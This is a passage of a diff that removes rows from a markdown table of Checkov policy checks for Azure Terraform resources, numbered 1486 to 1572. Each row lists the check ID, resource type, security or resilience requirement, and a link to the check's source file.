-| 1486 | CKV_AZURE_221   | resource | azurerm_linux_function_app_slot                         | Ensure that Azure Function App public network access is disabled                                                                                                                                         | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py)                                                       |
-| 1487 | CKV_AZURE_221   | resource | azurerm_windows_function_app                            | Ensure that Azure Function App public network access is disabled                                                                                                                                         | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py)                                                       |
-| 1488 | CKV_AZURE_221   | resource | azurerm_windows_function_app_slot                       | Ensure that Azure Function App public network access is disabled                                                                                                                                         | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py)                                                       |
-| 1489 | CKV_AZURE_222   | resource | azurerm_linux_web_app                                   | Ensure that Azure Web App public network access is disabled                                                                                                                                              | Terraform | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py)                                                         |
-| 1490 | CKV_AZURE_222   | resource | azurerm_windows_web_app                                 | Ensure that Azure Web App public network access is disabled                                                                                                                                              | Terraform | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py)                                                         |
-| 1491 | CKV_AZURE_223   | resource | azurerm_eventhub_namespace                              | Ensure Event Hub Namespace uses at least TLS 1.2                                                                                                                                                         | Terraform | [EventHubNamespaceMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceMinTLS12.py)                                                                   |
-| 1492 | CKV_AZURE_224   | resource | azurerm_mssql_database                                  | Ensure that the Ledger feature is enabled on database that requires cryptographic proof and nonrepudiation of data integrity                                                                             | Terraform | [SQLDatabaseLedgerEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseLedgerEnabled.py)                                                                     |
-| 1493 | CKV_AZURE_225   | resource | azurerm_service_plan                                    | Ensure the App Service Plan is zone redundant                                                                                                                                                            | Terraform | [AppServicePlanZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePlanZoneRedundant.py)                                                               |
-| 1494 | CKV_AZURE_226   | resource | azurerm_kubernetes_cluster                              | Ensure ephemeral disks are used for OS disks                                                                                                                                                             | Terraform | [AKSEphemeralOSDisks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEphemeralOSDisks.py)                                                                               |
-| 1495 | CKV_AZURE_227   | resource | azurerm_kubernetes_cluster                              | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources                                                                                             | Terraform | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py)                                                                 |
-| 1496 | CKV_AZURE_227   | resource | azurerm_kubernetes_cluster_node_pool                    | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources                                                                                             | Terraform | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py)                                                                 |
-| 1497 | CKV_AZURE_228   | resource | azurerm_eventhub_namespace                              | Ensure the Azure Event Hub Namespace is zone redundant                                                                                                                                                   | Terraform | [EventHubNamespaceZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceZoneRedundant.py)                                                         |
-| 1498 | CKV_AZURE_229   | resource | azurerm_mssql_database                                  | Ensure the Azure SQL Database Namespace is zone redundant                                                                                                                                                | Terraform | [SQLDatabaseZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseZoneRedundant.py)                                                                     |
-| 1499 | CKV_AZURE_230   | resource | azurerm_redis_cache                                     | Standard Replication should be enabled                                                                                                                                                                   | Terraform | [RedisCacheStandardReplicationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheStandardReplicationEnabled.py)                                             |
-| 1500 | CKV_AZURE_231   | resource | azurerm_app_service_environment_v3                      | Ensure App Service Environment is zone redundant                                                                                                                                                         | Terraform | [AppServiceEnvironmentZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnvironmentZoneRedundant.py)                                                 |
-| 1501 | CKV_AZURE_232   | resource | azurerm_kubernetes_cluster                              | Ensure that only critical system pods run on system nodes                                                                                                                                                | Terraform | [AKSOnlyCriticalPodsOnSystemNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSOnlyCriticalPodsOnSystemNodes.py)                                                     |
-| 1502 | CKV_AZURE_233   | resource | azurerm_container_registry                              | Ensure Azure Container Registry (ACR) is zone redundant                                                                                                                                                  | Terraform | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableZoneRedundancy.py)                                                                       |
-| 1503 | CKV_AZURE_234   | resource | azurerm_security_center_subscription_pricing            | Ensure that Azure Defender for cloud is set to On for Resource Manager                                                                                                                                   | Terraform | [AzureDefenderDisabledForResManager.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderDisabledForResManager.py)                                                 |
-| 1504 | CKV_AZURE_235   | resource | azurerm_container_group                                 | Ensure that Azure container environment variables are configured with secure values only                                                                                                                 | Terraform | [AzureContainerInstanceEnvVarSecureValueType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerInstanceEnvVarSecureValueType.py)                               |
-| 1505 | CKV2_AZURE_1    | resource | azurerm_storage_account                                 | Ensure storage for critical data are encrypted with Customer Managed Key                                                                                                                                 | Terraform | [StorageCriticalDataEncryptedCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageCriticalDataEncryptedCMK.yaml)                                               |
-| 1506 | CKV2_AZURE_2    | resource | azurerm_mssql_server_security_alert_policy              | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account                                                                                                        | Terraform | [VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml)                                                       |
-| 1507 | CKV2_AZURE_2    | resource | azurerm_sql_server                                      | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account                                                                                                        | Terraform | [VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml)                                                       |
-| 1508 | CKV2_AZURE_3    | resource | azurerm_mssql_server                                    | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server                                                                                                                               | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml)                                                               |
-| 1509 | CKV2_AZURE_3    | resource | azurerm_mssql_server_security_alert_policy              | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server                                                                                                                               | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml)                                                               |
-| 1510 | CKV2_AZURE_3    | resource | azurerm_mssql_server_vulnerability_assessment           | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server                                                                                                                               | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml)                                                               |
-| 1511 | CKV2_AZURE_3    | resource | azurerm_sql_server                                      | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server                                                                                                                               | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml)                                                               |
-| 1512 | CKV2_AZURE_4    | resource | azurerm_mssql_server                                    | Ensure Azure SQL server ADS VA Send scan reports to is configured                                                                                                                                        | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml)                                                           |
-| 1513 | CKV2_AZURE_4    | resource | azurerm_mssql_server_security_alert_policy              | Ensure Azure SQL server ADS VA Send scan reports to is configured                                                                                                                                        | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml)                                                           |
-| 1514 | CKV2_AZURE_4    | resource | azurerm_mssql_server_vulnerability_assessment           | Ensure Azure SQL server ADS VA Send scan reports to is configured                                                                                                                                        | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml)                                                           |
-| 1515 | CKV2_AZURE_4    | resource | azurerm_sql_server                                      | Ensure Azure SQL server ADS VA Send scan reports to is configured                                                                                                                                        | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml)                                                           |
-| 1516 | CKV2_AZURE_5    | resource | azurerm_mssql_server                                    | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server                                                                                         | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml)                                           |
-| 1517 | CKV2_AZURE_5    | resource | azurerm_mssql_server_security_alert_policy              | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server                                                                                         | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml)                                           |
-| 1518 | CKV2_AZURE_5    | resource | azurerm_mssql_server_vulnerability_assessment           | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server                                                                                         | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml)                                           |
-| 1519 | CKV2_AZURE_5    | resource | azurerm_sql_server                                      | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server                                                                                         | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml)                                           |
-| 1520 | CKV2_AZURE_6    | resource | azurerm_sql_firewall_rule                               | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled                                                                                                                       | Terraform | [AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml)                   |
-| 1521 | CKV2_AZURE_6    | resource | azurerm_sql_server                                      | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled                                                                                                                       | Terraform | [AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml)                   |
-| 1522 | CKV2_AZURE_7    | resource | azurerm_sql_server                                      | Ensure that Azure Active Directory Admin is configured                                                                                                                                                   | Terraform | [AzureActiveDirectoryAdminIsConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureActiveDirectoryAdminIsConfigured.yaml)                                   |
-| 1523 | CKV2_AZURE_8    | resource | azurerm_monitor_activity_log_alert                      | Ensure the storage container storing the activity logs is not publicly accessible                                                                                                                        | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml)                                   |
-| 1524 | CKV2_AZURE_8    | resource | azurerm_storage_account                                 | Ensure the storage container storing the activity logs is not publicly accessible                                                                                                                        | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml)                                   |
-| 1525 | CKV2_AZURE_8    | resource | azurerm_storage_container                               | Ensure the storage container storing the activity logs is not publicly accessible                                                                                                                        | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml)                                   |
-| 1526 | CKV2_AZURE_9    | resource | azurerm_virtual_machine                                 | Ensure Virtual Machines are utilizing Managed Disks                                                                                                                                                      | Terraform | [VirtualMachinesUtilizingManagedDisks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VirtualMachinesUtilizingManagedDisks.yaml)                                     |
-| 1527 | CKV2_AZURE_10   | resource | azurerm_virtual_machine                                 | Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines                                                                                                            | Terraform | [AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml)           |
-| 1528 | CKV2_AZURE_10   | resource | azurerm_virtual_machine_extension                       | Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines                                                                                                            | Terraform | [AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml)           |
-| 1529 | CKV2_AZURE_11   | resource | azurerm_kusto_cluster                                   | Ensure that Azure Data Explorer encryption at rest uses a customer-managed key                                                                                                                           | Terraform | [DataExplorerEncryptionUsesCustomKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/DataExplorerEncryptionUsesCustomKey.yaml)                                       |
-| 1530 | CKV2_AZURE_12   | resource | azurerm_virtual_machine                                 | Ensure that virtual machines are backed up using Azure Backup                                                                                                                                            | Terraform | [VMHasBackUpMachine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VMHasBackUpMachine.yaml)                                                                         |
-| 1531 | CKV2_AZURE_13   | resource | azurerm_mssql_server_security_alert_policy              | Ensure that sql servers enables data security policy                                                                                                                                                     | Terraform | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml)                                 |
-| 1532 | CKV2_AZURE_13   | resource | azurerm_sql_server                                      | Ensure that sql servers enables data security policy                                                                                                                                                     | Terraform | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml)                                 |
-| 1533 | CKV2_AZURE_14   | resource | azurerm_managed_disk                                    | Ensure that Unattached disks are encrypted                                                                                                                                                               | Terraform | [AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml)                                             |
-| 1534 | CKV2_AZURE_14   | resource | azurerm_virtual_machine                                 | Ensure that Unattached disks are encrypted                                                                                                                                                               | Terraform | [AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml)                                             |
-| 1535 | CKV2_AZURE_15   | resource | azurerm_data_factory                                    | Ensure that Azure data factories are encrypted with a customer-managed key                                                                                                                               | Terraform | [AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml)           |
-| 1536 | CKV2_AZURE_16   | resource | azurerm_mysql_server                                    | Ensure that MySQL server enables customer-managed key for encryption                                                                                                                                     | Terraform | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml)                                                   |
-| 1537 | CKV2_AZURE_16   | resource | azurerm_mysql_server_key                                | Ensure that MySQL server enables customer-managed key for encryption                                                                                                                                     | Terraform | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml)                                                   |
-| 1538 | CKV2_AZURE_17   | resource | azurerm_postgresql_server                               | Ensure that PostgreSQL server enables customer-managed key for encryption                                                                                                                                | Terraform | [PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml)                                                 |
-| 1539 | CKV2_AZURE_17   | resource | azurerm_postgresql_server_key                           | Ensure that PostgreSQL server enables customer-managed key for encryption                                                                                                                                | Terraform | [PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml)                                                 |
-| 1540 | CKV2_AZURE_19   | resource | azurerm_synapse_workspace                               | Ensure that Azure Synapse workspaces have no IP firewall rules attached                                                                                                                                  | Terraform | [AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml)       |
-| 1541 | CKV2_AZURE_20   | resource | azurerm_log_analytics_storage_insights                  | Ensure Storage logging is enabled for Table service for read requests                                                                                                                                    | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml)                                 |
-| 1542 | CKV2_AZURE_20   | resource | azurerm_storage_account                                 | Ensure Storage logging is enabled for Table service for read requests                                                                                                                                    | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml)                                 |
-| 1543 | CKV2_AZURE_20   | resource | azurerm_storage_table                                   | Ensure Storage logging is enabled for Table service for read requests                                                                                                                                    | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml)                                 |
-| 1544 | CKV2_AZURE_21   | resource | azurerm_log_analytics_storage_insights                  | Ensure Storage logging is enabled for Blob service for read requests                                                                                                                                     | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml)                                   |
-| 1545 | CKV2_AZURE_21   | resource | azurerm_storage_account                                 | Ensure Storage logging is enabled for Blob service for read requests                                                                                                                                     | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml)                                   |
-| 1546 | CKV2_AZURE_21   | resource | azurerm_storage_container                               | Ensure Storage logging is enabled for Blob service for read requests                                                                                                                                     | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml)                                   |
-| 1547 | CKV2_AZURE_22   | resource | azurerm_cognitive_account                               | Ensure that Cognitive Services enables customer-managed key for encryption                                                                                                                               | Terraform | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml)                                       |
-| 1548 | CKV2_AZURE_22   | resource | azurerm_cognitive_account_customer_managed_key          | Ensure that Cognitive Services enables customer-managed key for encryption                                                                                                                               | Terraform | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml)                                       |
-| 1549 | CKV2_AZURE_23   | resource | azurerm_spring_cloud_service                            | Ensure Azure spring cloud is configured with Virtual network (Vnet)                                                                                                                                      | Terraform | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSpringCloudConfigWithVnet.yaml)                                                 |
-| 1550 | CKV2_AZURE_24   | resource | azurerm_automation_account                              | Ensure Azure automation account does NOT have overly permissive network access                                                                                                                           | Terraform | [AzureAutomationAccNotOverlyPermissiveNetAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccNotOverlyPermissiveNetAccess.yaml)                 |
-| 1551 | CKV2_AZURE_25   | resource | azurerm_mssql_database                                  | Ensure Azure SQL database Transparent Data Encryption (TDE) is enabled                                                                                                                                   | Terraform | [AzureSqlDbEnableTransparentDataEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSqlDbEnableTransparentDataEncryption.yaml)                           |
-| 1552 | CKV2_AZURE_26   | resource | azurerm_postgresql_flexible_server_firewall_rule        | Ensure Azure PostgreSQL Flexible server is not configured with overly permissive network access                                                                                                          | Terraform | [AzurePostgreSQLFlexServerNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLFlexServerNotOverlyPermissive.yaml)                     |
-| 1553 | CKV2_AZURE_27   | resource | azurerm_mssql_server                                    | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL)                                                                                                                                          | Terraform | [AzureConfigMSSQLwithAD.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureConfigMSSQLwithAD.yaml)                                                                 |
-| 1554 | CKV2_AZURE_28   | resource | azurerm_container_group                                 | Ensure Container Instance is configured with managed identity                                                                                                                                            | Terraform | [AzureContainerInstanceconfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureContainerInstanceconfigManagedIdentity.yaml)                       |
-| 1555 | CKV2_AZURE_29   | resource | azurerm_kubernetes_cluster                              | Ensure AKS cluster has Azure CNI networking enabled                                                                                                                                                      | Terraform | [AzureAKSclusterAzureCNIEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAKSclusterAzureCNIEnabled.yaml)                                                 |
-| 1556 | CKV2_AZURE_30   | resource | azurerm_container_registry_webhook                      | Ensure Azure Container Registry (ACR) has HTTPS enabled for webhook                                                                                                                                      | Terraform | [AzureACR_HTTPSwebhook.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureACR_HTTPSwebhook.yaml)                                                                   |
-| 1557 | CKV2_AZURE_31   | resource | azurerm_subnet                                          | Ensure VNET subnet is configured with a Network Security Group (NSG)                                                                                                                                     | Terraform | [AzureSubnetConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSubnetConfigWithNSG.yaml)                                                             |
-| 1558 | CKV2_AZURE_32   | resource | azurerm_key_vault                                       | Ensure private endpoint is configured to key vault                                                                                                                                                       | Terraform | [AzureKeyVaultConfigPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureKeyVaultConfigPrivateEndpoint.yaml)                                         |
-| 1559 | CKV2_AZURE_33   | resource | azurerm_storage_account                                 | Ensure storage account is configured with private endpoint                                                                                                                                               | Terraform | [AzureStorageAccConfigWithPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithPrivateEndpoint.yaml)                             |
-| 1560 | CKV2_AZURE_34   | resource | azurerm_sql_firewall_rule                               | Ensure Azure SQL server firewall is not overly permissive                                                                                                                                                | Terraform | [AzureSQLserverNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSQLserverNotOverlyPermissive.yaml)                                           |
-| 1561 | CKV2_AZURE_35   | resource | azurerm_recovery_services_vault                         | Ensure Azure recovery services vault is configured with managed identity                                                                                                                                 | Terraform | [AzureRecoveryServicesvaultConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureRecoveryServicesvaultConfigManagedIdentity.yaml)               |
-| 1562 | CKV2_AZURE_36   | resource | azurerm_automation_account                              | Ensure Azure automation account is configured with managed identity                                                                                                                                      | Terraform | [AzureAutomationAccConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccConfigManagedIdentity.yaml)                               |
-| 1563 | CKV2_AZURE_37   | resource | azurerm_mariadb_server                                  | Ensure Azure MariaDB server is using latest TLS (1.2)                                                                                                                                                    | Terraform | [AzureMariaDBserverUsingTLS_1_2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverUsingTLS_1_2.yaml)                                                 |
-| 1564 | CKV2_AZURE_38   | resource | azurerm_storage_account                                 | Ensure soft-delete is enabled on Azure storage account                                                                                                                                                   | Terraform | [AzureStorageAccountEnableSoftDelete.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccountEnableSoftDelete.yaml)                                       |
-| 1565 | CKV2_AZURE_39   | resource | azurerm_linux_virtual_machine                           | Ensure Azure VM is not configured with public IP and serial console access                                                                                                                               | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml)                           |
-| 1566 | CKV2_AZURE_39   | resource | azurerm_network_interface                               | Ensure Azure VM is not configured with public IP and serial console access                                                                                                                               | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml)                           |
-| 1567 | CKV2_AZURE_39   | resource | azurerm_virtual_machine                                 | Ensure Azure VM is not configured with public IP and serial console access                                                                                                                               | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml)                           |
-| 1568 | CKV2_AZURE_39   | resource | azurerm_windows_virtual_machine                         | Ensure Azure VM is not configured with public IP and serial console access                                                                                                                               | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml)                           |
-| 1569 | CKV2_AZURE_40   | resource | azurerm_storage_account                                 | Ensure storage account is not configured with Shared Key authorization                                                                                                                                   | Terraform | [AzureStorageAccConfigSharedKeyAuth.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigSharedKeyAuth.yaml)                                         |
-| 1570 | CKV2_AZURE_41   | resource | azurerm_storage_account                                 | Ensure storage account is configured with SAS expiration policy                                                                                                                                          | Terraform | [AzureStorageAccConfig_SAS_expirePolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfig_SAS_expirePolicy.yaml)                                 |
-| 1571 | CKV2_AZURE_42   | resource | azurerm_postgresql_server                               | Ensure Azure PostgreSQL server is configured with private endpoint                                                                                                                                       | Terraform | [AzurePostgreSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLserverConfigPrivEndpt.yaml)                                     |
-| 1572 | CKV2_AZURE_43   | resource | azurerm_mariadb_server                                  | Ensure Azure MariaDB server is configured with private endpoint                                                                                                                                          | Terraform | [AzureMariaDBserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverConfigPrivEndpt.yaml)                                           |
